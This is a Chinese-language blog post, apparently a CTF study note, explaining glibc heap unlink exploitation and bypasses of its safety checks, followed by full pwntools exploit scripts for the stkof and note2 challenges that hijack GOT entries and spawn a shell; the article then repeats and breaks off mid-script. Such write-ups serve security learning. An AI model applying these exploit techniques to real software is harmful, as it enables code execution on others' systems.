<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="unlink利用简单的讲就是把空闲的chunk合并，（如果真是这么简单就好了，苦笑） unlink是一个函数，当一个chunk被free后，他会检测这个chunk上的物理相邻地址，如果空闲的话两个chunk就会合并，注意要释放的这个chunk大小得超过fastbins的大小（0x80） 确定相邻低地址堆是否为空闲堆看的是size的最后一位p，如果它为0时，表示上一个堆是空闲的，那就可以进行合并，两">
<meta property="og:type" content="article">
<meta property="og:title" content="unlink">
<meta property="og:url" content="http://example.com/2021/11/12/unlink/index.html">
<meta property="og:site_name" content="study">
<meta property="og:description" content="unlink利用简单的讲就是把空闲的chunk合并，（如果真是这么简单就好了，苦笑） unlink是一个函数，当一个chunk被free后，他会检测这个chunk上的物理相邻地址，如果空闲的话两个chunk就会合并，注意要释放的这个chunk大小得超过fastbins的大小（0x80） 确定相邻低地址堆是否为空闲堆看的是size的最后一位p，如果它为0时，表示上一个堆是空闲的，那就可以进行合并，两">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="c:/Users/张鹏/AppData/Roaming/Typora/typora-user-images/image-20211112002946764.png">
<meta property="og:image" content="c:/Users/张鹏/AppData/Roaming/Typora/typora-user-images/image-20211112002946764.png">
<meta property="article:published_time" content="2021-11-11T17:12:38.000Z">
<meta property="article:modified_time" content="2021-11-17T09:17:24.991Z">
<meta property="article:author" content="rootzhang">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="c:/Users/张鹏/AppData/Roaming/Typora/typora-user-images/image-20211112002946764.png">

<link rel="canonical" href="http://example.com/2021/11/12/unlink/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>unlink | study</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">study</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/11/12/unlink/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="rootzhang">
      <meta itemprop="description" content="我的博客">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="study">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          unlink
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2021-11-12 01:12:38" itemprop="dateCreated datePublished" datetime="2021-11-12T01:12:38+08:00">2021-11-12</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2021-11-17 17:17:24" itemprop="dateModified" datetime="2021-11-17T17:17:24+08:00">2021-11-17</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="unlink利用"><a href="#unlink利用" class="headerlink" title="unlink利用"></a>unlink利用</h1><p>简单的讲就是把空闲的chunk合并，（如果真是这么简单就好了，苦笑）</p>
<p>unlink是一个函数，当一个chunk被free后，他会检测这个chunk上的物理相邻地址，如果空闲的话两个chunk就会合并，注意要释放的这个chunk大小得超过fastbins的大小（0x80）</p>
<p>确定相邻低地址堆是否为空闲堆看的是size的最后一位p，如果它为0时，表示上一个堆是空闲的，那就可以进行合并，两个堆要进行合并，那得知道这个合并的堆的物理地址才行，电脑并不能像人类一样肉眼就知道上一个堆的物理地址在那，他是通过这个堆的prev_size的大小确定的，prev_size是堆的前八个字节，如果p为0的话，那就记录这上个相邻堆的大小，当前堆地址减去prev_size就是上个堆的地址。</p>
<p>通过p和prev_size知道上个堆是空闲的且确定了堆的地址，那就可以对上一个堆进行ublink操作了。</p>
<p><img src="C:\Users\张鹏\AppData\Roaming\Typora\typora-user-images\image-20211112002946764.png" alt="image-20211112002946764"></p>
<p>就是链表操作，链表上p的下一个chunk是p-&gt;fd,上一个chunk是p-&gt;bk,操作目的就是把这个两个chunk连起来</p>
<p>令FD=p-&gt;fd,BK=p-&gt;bk</p>
<p>然后令FD-&gt;bk=BK;BK-&gt;fd=FD;</p>
<p>就把p摘下来了，仔细看起来并没有什么漏洞，ok,本文完</p>
<p>苦笑，就是看起来没有漏洞所以利用起来的时候就很麻烦，如果我们在将要free掉的chunk前面fake一个chunk的话，并且伪造成空闲的，那free的时候就会合并这个fakechunk，因为是我们伪造的，所以这个chunk的fd和bk都是可控的，然后就可以让他乱指了（并不是。</p>
<p>先假设unlink没有限制条件，用他来完成任一地址写，假设任意写的地址为addr,要写的内容为value,令p-&gt;fd=addr-0x18,BK=value,那unlink执行FD-&gt;bk=BK是就是*(addr-0x18+0x18)=value，就完成任意写了。</p>
<p>怎么可能这么简单，这是古老版本unlink的执行过程，现在的ublink都设置了限制条件，即FD-&gt;bk=p&amp;BK-&gt;fd,如果不相等就会执行错误，这样就又看似无法利用漏洞了，但道高一尺魔高一丈，我们可以利用这个机制完成一个目标，即令储存chunk地址的指针指向这个指针的前三个位置处，比如储存chunk的指令是这样排布的，m,n,b,v,我们要ublink掉b的话，就可以让b指向m,也就是前十八个字节（64位系统），*（b）=&amp;m,这样就会让堆指针没指到堆了。</p>
<p>出了上面的那个限制条件，unlink还有另一个限制条件</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 由于P已经在双向链表中，所以有两个地方记录其大小，所以检查一下其大小是否一致。</span></span><br><span class="line"><span class="keyword">if</span> (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), <span class="number">0</span>))      \</span><br><span class="line">  malloc_printerr (<span class="string">&quot;corrupted size vs. prev_size&quot;</span>);     </span><br></pre></td></tr></table></figure>

<p>就是要unlink的堆的大小被两个地方记录，一个是自身的size另一个下一个物理相邻堆的prev_size，他会检查这个两个地方是否相等，所以伪造堆的时候还得构造prev_size,prev_size的地址就是当前堆加上自己的size就是下一个堆的地址，也是prev-size的地址。只要使(p+size)=size就行。</p>
<p>至于怎么完成这个目标，我觉得挺巧妙的，就是直接令FD-&gt;bk和BK-&gt;fd都指向p堆的指针，所以fd和bk不是储存p堆的地址，而是储存p堆指针的地址，令储存p堆的指针为m,这样执行FD-&gt;bk=BK;BK-&gt;fd=FD;就是这个样子</p>
<p>FD-&gt;bk=m=BK=(&amp;m-0x10);;BK-&gt;fd=m=(&amp;m-0x18)<br>最后m=(&amp;m-0x18).再对p堆写入数据时，实际上就向&amp;m-0x18处写入数据。okok，大工搞成（我觉得我讲的挺明白的了）</p>
<p>贴下wiki的例题stkof脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level=<span class="string">&#x27;debug&#x27;</span></span><br><span class="line">sh=process(<span class="string">&#x27;./stkof&#x27;</span>)</span><br><span class="line">elf=ELF(<span class="string">&#x27;./stkof&#x27;</span>)</span><br><span class="line">libc=ELF(<span class="string">&#x27;./libc.so.6&#x27;</span>)</span><br><span class="line">p=<span class="number">0x602140</span>+<span class="number">16</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">alloc</span>(<span class="params">size</span>):</span></span><br><span class="line">    sh.sendline(<span class="string">&#x27;1&#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="built_in">str</span>(size))</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;OK\n&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">index,le,content</span>):</span></span><br><span class="line">    sh.sendline(<span class="string">&#x27;2&#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="built_in">str</span>(index))</span><br><span class="line">    sh.sendline(<span class="built_in">str</span>(le))</span><br><span class="line">    sh.send(content)</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;OK\n&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">free</span>(<span class="params">index</span>):</span></span><br><span class="line">    sh.sendline(<span class="string">&#x27;3&#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">alloc(<span class="number">0x100</span>)</span><br><span class="line"><span class="comment">#index=2</span></span><br><span class="line">alloc(<span class="number">0x30</span>)</span><br><span class="line"><span class="comment">#index=3</span></span><br><span class="line">alloc(<span class="number">0x80</span>)</span><br><span class="line"><span class="comment">#fake chunk</span></span><br><span class="line">payload=p64(<span class="number">0</span>)+p64(<span class="number">0x20</span>)+p64(p-<span class="number">0x18</span>)+p64(p-<span class="number">0x10</span>)+p64(<span class="number">0x20</span>)</span><br><span class="line">payload=payload.ljust(<span class="number">0x30</span>,<span class="string">&#x27;a&#x27;</span>)</span><br><span class="line">payload+=p64(<span class="number">0x30</span>)+p64(<span class="number">0x90</span>)</span><br><span class="line">edit(<span class="number">2</span>,<span class="built_in">len</span>(payload),payload)</span><br><span class="line"><span class="comment">#unlink</span></span><br><span class="line">free(<span class="number">3</span>)</span><br><span class="line">sh.recvuntil(<span class="string">&#x27;OK\n&#x27;</span>)</span><br><span class="line">payload1=<span class="string">&#x27;a&#x27;</span>*<span class="number">0x8</span>+p64(elf.got[<span class="string">&#x27;free&#x27;</span>])+p64(elf.got[<span class="string">&#x27;puts&#x27;</span>])</span><br><span class="line">payload1+=p64(elf.got[<span class="string">&#x27;atoi&#x27;</span>])</span><br><span class="line"></span><br><span class="line">edit(<span class="number">2</span>,<span class="built_in">len</span>(payload1),payload1)</span><br><span class="line"></span><br><span class="line">payload2=p64(elf.plt[<span class="string">&#x27;puts&#x27;</span>])</span><br><span class="line">edit(<span class="number">0</span>,<span class="built_in">len</span>(payload2),payload2)</span><br><span class="line">free(<span class="number">1</span>)</span><br><span class="line">puts_addr=u64(sh.recv().split(<span class="string">&#x27;\n&#x27;</span>)[<span class="number">0</span>].ljust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>))</span><br><span class="line"><span class="built_in">print</span> <span class="built_in">hex</span>(puts_addr)</span><br><span class="line">libc_base=puts_addr-libc.symbols[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">system=libc_base+libc.symbols[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">binsh_addr=binsh_addr = libc_base + <span class="built_in">next</span>(libc.search(<span class="string">&#x27;/bin/sh&#x27;</span>))</span><br><span class="line">payload3=p64(system)</span><br><span class="line">edit(<span class="number">2</span>,<span class="built_in">len</span>(payload3),payload3)</span><br><span class="line">sh.send(p64(binsh_addr))</span><br><span class="line">sh.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>下面是note2的脚本，和上面的例题差不多，都是绕过两个条件就行。布置好堆的情况就行。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">sh=process(<span class="string">&#x27;./note2&#x27;</span>)</span><br><span class="line">context.log_level=<span class="string">&#x27;debug&#x27;</span></span><br><span class="line">elf=ELF(<span class="string">&#x27;./note2&#x27;</span>)</span><br><span class="line">libc = ELF(<span class="string">&quot;/lib/x86_64-linux-gnu/libc.so.6&quot;</span>)</span><br><span class="line">puts_got=elf.got[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">puts_plt=elf.plt[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">head=<span class="number">0x602120</span></span><br><span class="line"><span class="comment">#gdb.attach(sh,&#x27;b *0x400F6C&#x27;)</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">init</span>(<span class="params">name,addr</span>):</span></span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;Input your name:&#x27;</span>)</span><br><span class="line">    sh.sendline(name)</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;Input your address:&#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="built_in">str</span>(addr))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">alloc</span>(<span class="params">size,content</span>):</span></span><br><span class="line">    sh.sendline(<span class="string">&#x27;1&#x27;</span>)</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;Input the length of the note content:(less than 128)&#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="built_in">str</span>(size))</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;Input the note content:&#x27;</span>)</span><br><span class="line">    sh.sendline(content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params">index</span>):</span></span><br><span class="line">    sh.sendline(<span class="string">&#x27;2&#x27;</span>)</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;Input the id of the note:\n&#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">index,choice,content</span>):</span></span><br><span class="line">    sh.sendline(<span class="string">&#x27;3&#x27;</span>)</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;Input the id of the note:\n&#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="built_in">str</span>(index))</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;do you want to overwrite or append?[1.overwrite/2.append]&#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="built_in">str</span>(choice))</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;TheNewContents:&#x27;</span>)</span><br><span class="line">    sh.sendline(content)</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;Edit note success!&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">free</span>(<span class="params">index</span>):</span></span><br><span class="line">    sh.sendline(<span class="string">&#x27;4&#x27;</span>)</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;Input the id of the note:\n&#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line">init(<span class="string">&#x27;rootzh&#x27;</span>,<span class="number">0x12</span>)</span><br><span class="line">payload=<span class="string">&#x27;a&#x27;</span>*<span class="number">0x8</span>+p64(<span class="number">0xa1</span>)+p64(head-<span class="number">0x18</span>)+p64(head-<span class="number">0x10</span>)+<span class="string">&#x27;a&#x27;</span>*<span class="number">0x60</span></span><br><span class="line">alloc(<span class="number">0x80</span>,payload)</span><br><span class="line">alloc(<span class="number">0</span>,<span class="string">&#x27;bbbbb&#x27;</span>)</span><br><span class="line">alloc(<span class="number">0x80</span>,<span class="string">&#x27;ccccc&#x27;</span>)</span><br><span class="line">free(<span class="number">1</span>)</span><br><span class="line">payload1=<span class="string">&#x27;a&#x27;</span>*<span class="number">0x10</span>+p64(<span class="number">0xa0</span>)+p64(<span class="number">0x90</span>)</span><br><span class="line">alloc(<span class="number">0</span>,payload1)</span><br><span class="line">free(<span class="number">2</span>)</span><br><span class="line">payload2=<span class="string">&#x27;a&#x27;</span>*<span class="number">0x18</span>+p64(elf.got[<span class="string">&#x27;atoi&#x27;</span>])</span><br><span class="line">edit(<span class="number">0</span>,<span class="number">1</span>,payload2)</span><br><span class="line">show(<span class="number">0</span>)</span><br><span class="line">sh.recvuntil(<span class="string">&#x27;Content is &#x27;</span>)</span><br><span class="line">atoi_addr=u64(sh.recvuntil(<span class="string">&#x27;\n&#x27;</span>,drop=<span class="literal">True</span>).ljust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>))</span><br><span class="line"><span class="built_in">print</span> <span class="built_in">hex</span>(atoi_addr)</span><br><span class="line">libc_base=atoi_addr-libc.symbols[<span class="string">&#x27;atoi&#x27;</span>]</span><br><span class="line"><span class="built_in">print</span> <span class="built_in">hex</span>(libc_base)</span><br><span class="line">system=libc_base+libc.symbols[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">binsh=libc_base+<span class="built_in">next</span>(libc.search(<span class="string">&#x27;/bin/sh&#x27;</span>))</span><br><span class="line">payload3=p64(system)</span><br><span class="line"><span class="built_in">print</span> <span class="built_in">hex</span>(system)</span><br><span class="line">edit(<span class="number">0</span>,<span class="number">1</span>,payload3)</span><br><span class="line">sh.recvuntil(<span class="string">&#x27;option---&gt;&gt;&#x27;</span>)</span><br><span class="line">sh.sendline(p64(binsh))</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>



<h1 id="unlink利用-1"><a href="#unlink利用-1" class="headerlink" title="unlink利用"></a>unlink利用</h1><p>简单的讲就是把空闲的chunk合并，（如果真是这么简单就好了，苦笑）</p>
<p>unlink是一个函数，当一个chunk被free后，他会检测这个chunk上的物理相邻地址，如果空闲的话两个chunk就会合并，注意要释放的这个chunk大小得超过fastbins的大小（0x80）</p>
<p>确定相邻低地址堆是否为空闲堆看的是size的最后一位p，如果它为0时，表示上一个堆是空闲的，那就可以进行合并，两个堆要进行合并，那得知道这个合并的堆的物理地址才行，电脑并不能像人类一样肉眼就知道上一个堆的物理地址在那，他是通过这个堆的prev_size的大小确定的，prev_size是堆的前八个字节，如果p为0的话，那就记录这上个相邻堆的大小，当前堆地址减去prev_size就是上个堆的地址。</p>
<p>通过p和prev_size知道上个堆是空闲的且确定了堆的地址，那就可以对上一个堆进行ublink操作了。</p>
<p><img src="C:\Users\张鹏\AppData\Roaming\Typora\typora-user-images\image-20211112002946764.png" alt="image-20211112002946764"></p>
<p>就是链表操作，链表上p的下一个chunk是p-&gt;fd,上一个chunk是p-&gt;bk,操作目的就是把这个两个chunk连起来</p>
<p>令FD=p-&gt;fd,BK=p-&gt;bk</p>
<p>然后令FD-&gt;bk=BK;BK-&gt;fd=FD;</p>
<p>就把p摘下来了，仔细看起来并没有什么漏洞，ok,本文完</p>
<p>苦笑，就是看起来没有漏洞所以利用起来的时候就很麻烦，如果我们在将要free掉的chunk前面fake一个chunk的话，并且伪造成空闲的，那free的时候就会合并这个fakechunk，因为是我们伪造的，所以这个chunk的fd和bk都是可控的，然后就可以让他乱指了（并不是。</p>
<p>先假设unlink没有限制条件，用他来完成任一地址写，假设任意写的地址为addr,要写的内容为value,令p-&gt;fd=addr-0x18,BK=value,那unlink执行FD-&gt;bk=BK是就是*(addr-0x18+0x18)=value，就完成任意写了。</p>
<p>怎么可能这么简单，这是古老版本unlink的执行过程，现在的ublink都设置了限制条件，即FD-&gt;bk=p&amp;BK-&gt;fd,如果不相等就会执行错误，这样就又看似无法利用漏洞了，但道高一尺魔高一丈，我们可以利用这个机制完成一个目标，即令储存chunk地址的指针指向这个指针的前三个位置处，比如储存chunk的指令是这样排布的，m,n,b,v,我们要ublink掉b的话，就可以让b指向m,也就是前十八个字节（64位系统），*（b）=&amp;m,这样就会让堆指针没指到堆了。</p>
<p>出了上面的那个限制条件，unlink还有另一个限制条件</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 由于P已经在双向链表中，所以有两个地方记录其大小，所以检查一下其大小是否一致。</span></span><br><span class="line"><span class="keyword">if</span> (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), <span class="number">0</span>))      \</span><br><span class="line">  malloc_printerr (<span class="string">&quot;corrupted size vs. prev_size&quot;</span>);     </span><br></pre></td></tr></table></figure>

<p>就是要unlink的堆的大小被两个地方记录，一个是自身的size另一个下一个物理相邻堆的prev_size，他会检查这个两个地方是否相等，所以伪造堆的时候还得构造prev_size,prev_size的地址就是当前堆加上自己的size就是下一个堆的地址，也是prev-size的地址。只要使(p+size)=size就行。</p>
<p>至于怎么完成这个目标，我觉得挺巧妙的，就是直接令FD-&gt;bk和BK-&gt;fd都指向p堆的指针，所以fd和bk不是储存p堆的地址，而是储存p堆指针的地址，令储存p堆的指针为m,这样执行FD-&gt;bk=BK;BK-&gt;fd=FD;就是这个样子</p>
<p>FD-&gt;bk=m=BK=(&amp;m-0x10);;BK-&gt;fd=m=(&amp;m-0x18)<br>最后m=(&amp;m-0x18).再对p堆写入数据时，实际上就向&amp;m-0x18处写入数据。okok，大工搞成（我觉得我讲的挺明白的了）</p>
<p>贴下wiki的例题stkof脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level=<span class="string">&#x27;debug&#x27;</span></span><br><span class="line">sh=process(<span class="string">&#x27;./stkof&#x27;</span>)</span><br><span class="line">elf=ELF(<span class="string">&#x27;./stkof&#x27;</span>)</span><br><span class="line">libc=ELF(<span class="string">&#x27;./libc.so.6&#x27;</span>)</span><br><span class="line">p=<span class="number">0x602140</span>+<span class="number">16</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">alloc</span>(<span class="params">size</span>):</span></span><br><span class="line">    sh.sendline(<span class="string">&#x27;1&#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="built_in">str</span>(size))</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;OK\n&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">index,le,content</span>):</span></span><br><span class="line">    sh.sendline(<span class="string">&#x27;2&#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="built_in">str</span>(index))</span><br><span class="line">    sh.sendline(<span class="built_in">str</span>(le))</span><br><span class="line">    sh.send(content)</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;OK\n&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">free</span>(<span class="params">index</span>):</span></span><br><span class="line">    sh.sendline(<span class="string">&#x27;3&#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">alloc(<span class="number">0x100</span>)</span><br><span class="line"><span class="comment">#index=2</span></span><br><span class="line">alloc(<span class="number">0x30</span>)</span><br><span class="line"><span class="comment">#index=3</span></span><br><span class="line">alloc(<span class="number">0x80</span>)</span><br><span class="line"><span class="comment">#fake chunk</span></span><br><span class="line">payload=p64(<span class="number">0</span>)+p64(<span class="number">0x20</span>)+p64(p-<span class="number">0x18</span>)+p64(p-<span class="number">0x10</span>)+p64(<span class="number">0x20</span>)</span><br><span class="line">payload=payload.ljust(<span 